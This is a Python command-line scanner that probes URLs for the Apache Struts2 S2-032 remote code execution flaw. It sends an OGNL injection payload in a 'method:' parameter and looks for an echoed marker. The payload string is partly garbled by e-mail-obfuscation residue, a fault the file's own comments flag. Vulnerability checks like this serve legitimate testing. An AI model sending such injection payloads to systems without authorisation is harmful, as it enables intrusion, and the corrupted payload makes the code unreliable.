import requests
import getopt
import sys
import time
# Verbose-output switch: main() turns it on when -v is passed, check() reads it.
DEBUG = False
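def check(url):
    """Probe *url* for Struts2 S2-032 and print the outcome.

    One GET request is sent whose query string carries the probe expression
    plus a marker value in the ``tag`` parameter; the response body is then
    searched for that marker.

    Args:
        url: Address of the endpoint to test.

    Returns:
        True when the marker appears in the response body. False when it does
        not, and also when the request could not be completed, in which case a
        separate "[!] request failed" line is printed so the two outcomes can
        be told apart in the output.
    """
    request_timeout = 10  # seconds; without a timeout a silent host blocks the run forever

    now = time.strftime('%H:%M:%S', time.localtime())
    print("[" + str(now) + "] [INFO] Checking Struts2 (S2-032) Remote Code Execution...")
    tag = 'S2-032'
    print("Check URL : " + url)
    # NOTE(review): the "[email protected]" fragments in the key below look like
    # e-mail-obfuscation residue from the page this file was copied from, so
    # the literal is probably not what the author wrote. It is kept verbatim.
    payload = {'method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse().getWriter(),#writer.println(#parameters.tag[0]),#writer.flush(),#writer.close': '', 'tag': tag}
    try:
        # TLS certificate verification stays at the requests default (enabled).
        r = requests.get(url, params=payload, timeout=request_timeout)
    except requests.RequestException as err:
        # Unreachable host, bad URL, TLS failure or timeout: no verdict possible.
        print('[!] request failed, url: %s (%s)' % (url, err))
        return False
    if DEBUG:
        print("Content:\n" + r.text)
    # The marker also travels as the plain `tag` query parameter, so a page
    # that simply echoes the query string matches as well. Treat a hit as a
    # lead to confirm against the installed Struts version, not as proof.
    if tag in r.text:
        if DEBUG:
            print("[+] vuls found with payload: %s" % r.url)
        else:
            print("[+] vuls found!!")
        return True
    print('[!] no vuls! url: %s' % url)
    return False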
def exp():
    """Unimplemented placeholder: the body does nothing and returns None."""
    return None
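def main():
    """Parse the command line and run check() on each URL given with -u.

    Options:
        -u URL  endpoint to check
        -v      verbose output (sets the module-level DEBUG flag)
        -h      print usage and return

    Exits with status 2 on an unknown option or when no -u is supplied.
    """
    global DEBUG
    usage = "usage: %s -u <url> [-v]" % sys.argv[0]
    try:
        # "h" is accepted here so that the hint in the warning below is true;
        # with the former "u:v" spec, -h itself was rejected as unknown.
        options, _args = getopt.getopt(sys.argv[1:], "hu:v")
    except getopt.GetoptError:
        print("[WARNING] error, to see help message of options run with '-h'")
        sys.exit(2)  # non-zero so wrappers and CI see the failure

    flags = [name for name, _value in options]
    if "-h" in flags:
        print(usage)
        return
    if "-v" in flags:
        DEBUG = True

    # Exact comparison: ("-u") is a plain string, so `name in ("-u")` was a
    # substring test that only worked by accident.
    targets = [value for name, value in options if name == "-u"]
    if not targets:
        print(usage)
        sys.exit(2)
    for target in targets:
        check(target)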
# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()